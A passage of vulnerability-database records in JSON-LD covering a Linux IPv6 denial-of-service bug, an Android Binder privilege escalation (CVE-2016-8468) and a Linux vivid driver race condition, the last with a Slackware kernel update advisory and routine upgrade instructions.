        "id": "CVE-2007-4567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "PACKETSTORM",
        "id": "61952"
      },
      {
        "db": "PACKETSTORM",
        "id": "61991"
      },
      {
        "db": "PACKETSTORM",
        "id": "63233"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "85224"
      },
      {
        "db": "PACKETSTORM",
        "id": "63291"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-12-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "date": "2007-12-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "date": "2007-12-19T00:00:00",
        "db": "BID",
        "id": "26943"
      },
      {
        "date": "2010-02-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "date": "2007-12-20T00:44:46",
        "db": "PACKETSTORM",
        "id": "61952"
      },
      {
        "date": "2007-12-24T18:50:38",
        "db": "PACKETSTORM",
        "id": "61991"
      },
      {
        "date": "2008-02-04T19:42:55",
        "db": "PACKETSTORM",
        "id": "63233"
      },
      {
        "date": "2010-05-28T20:14:56",
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "date": "2010-01-17T12:50:46",
        "db": "PACKETSTORM",
        "id": "85224"
      },
      {
        "date": "2008-02-06T00:59:36",
        "db": "PACKETSTORM",
        "id": "63291"
      },
      {
        "date": "2007-12-21T00:46:00",
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "date": "2007-12-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "date": "2018-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "date": "2010-05-28T11:20:00",
        "db": "BID",
        "id": "26943"
      },
      {
        "date": "2010-04-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "date": "2023-02-13T02:18:19.427000",
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "date": "2023-05-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  ipv6_hop_jumbo Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Input Validation Error",
    "sources": [
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ],
    "trust": 0.9
  }
}

var-201701-0139
Vulnerability from variot

An elevation of privilege vulnerability in Binder could enable a local malicious application to execute arbitrary code within the context of a privileged process. This issue is rated as Moderate because it first requires compromising a privileged process and is mitigated by current platform configurations. Product: Android. Versions: Kernel-3.18. Android ID: A-32394425. Binder Contains a vulnerability with elevated privileges. GooglePixelC and so on are all smart devices from Google. Binder is one of the system interprocess communication (IPC) mode components. Google Pixel is prone to a privilege-escalation vulnerability

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0139",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel c",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "BID",
        "id": "95285"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The vendor reported this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "95285"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-8468",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8468",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00342",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8468",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8468",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00342",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-123",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8468",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in Binder could enable a local malicious application to execute arbitrary code within the context of a privileged process. This issue is rated as Moderate because it first requires compromising a privileged process and is mitigated by current platform configurations. Product: Android. Versions: Kernel-3.18. Android ID: A-32394425. Binder Contains a vulnerability with elevated privileges. GooglePixelC and so on are all smart devices from Google. Binder is one of the system interprocess communication (IPC) mode components. Google Pixel is prone to a privilege-escalation vulnerability",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "BID",
        "id": "95285"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8468",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95285",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "db": "BID",
        "id": "95285"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "id": "VAR-201701-0139",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:44:47.416000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GooglePixelBinder privilege escalation vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87813"
      },
      {
        "title": "Google Pixel C , Pixel  and Pixel XL Binder Fixes for permission permissions and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66858"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95285"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8468"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8468"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "db": "BID",
        "id": "95285"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "db": "BID",
        "id": "95285"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95285"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "date": "2017-01-12T20:59:01.717000",
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00342"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8468"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95285"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      },
      {
        "date": "2017-01-18T02:59:16.267000",
        "db": "NVD",
        "id": "CVE-2016-8468"
      },
      {
        "date": "2017-01-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Binder Vulnerability in which privileges are elevated",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006784"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-123"
      }
    ],
    "trust": 0.6
  }
}

var-201911-0712
Vulnerability from variot

An issue was discovered in drivers/media/platform/vivid in the Linux kernel through 5.3.8. It is exploitable for privilege escalation on some Linux distributions where local users have /dev/video0 access, but only if the driver happens to be loaded. There are multiple race conditions during streaming stopping in this driver (part of the V4L2 subsystem). These issues are caused by wrong mutex locking in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), sdr_cap_stop_streaming(), and the corresponding kthreads. At least one of these race conditions leads to a use-after-free. Linux Kernel Contains a race condition vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

[slackware-security] Slackware 14.2 kernel (SSA:2020-008-01)

New kernel packages are available for Slackware 14.2 to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.208/: Upgraded. IPV6_MULTIPLE_TABLES n -> y +IPV6_SUBTREES y These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.203: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19524 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15917 Fixed in 4.4.204: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18660 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18683 Fixed in 4.4.206: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12614 Fixed in 4.4.207: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19227 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19062 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19338 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19332 Fixed in 4.4.208: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19057 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19063 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-smp-4.4.208_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-smp-4.4.208_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-smp-4.4.208_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208_smp-noarch-1.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208-noarch-1.txz

MD5 signatures: +-------------+

Slackware 14.2 packages: ef3ab53561656d90c19389bed7f883ea kernel-generic-4.4.208-i586-1.txz ce33ac504adf47d140c3d9ffbf7589b2 kernel-generic-smp-4.4.208_smp-i686-1.txz 2fb222e279ceacf6e3af294a1cce54e9 kernel-headers-4.4.208_smp-x86-1.txz c237d6708a9d59080deb5a6659d1acf1 kernel-huge-4.4.208-i586-1.txz 29018038f4e0510dfa7e9cdfe69c994a kernel-huge-smp-4.4.208_smp-i686-1.txz 6518395d78e7c7b323bd964dd3b9ed13 kernel-modules-4.4.208-i586-1.txz 440885e37ee410473bf1c9a6b028dd8b kernel-modules-smp-4.4.208_smp-i686-1.txz 969021b83f0cb73d7b745b3d77bdbee0 kernel-source-4.4.208_smp-noarch-1.txz

Slackware x86_64 14.2 packages: d6edb0754c752aaf8fcbd8d4d5bfc30a kernel-generic-4.4.208-x86_64-1.txz 10255231f7085336046b49e829bf972c kernel-headers-4.4.208-x86-1.txz 369fa14fb7f59f1e903402be3ad685e7 kernel-huge-4.4.208-x86_64-1.txz b8c8261fbb6bed66c3ded3aa36e206df kernel-modules-4.4.208-x86_64-1.txz 83f37ca83c19fe8d1a785c93cc1ad6f5 kernel-source-4.4.208-noarch-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208 | bash

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.208-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.208 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

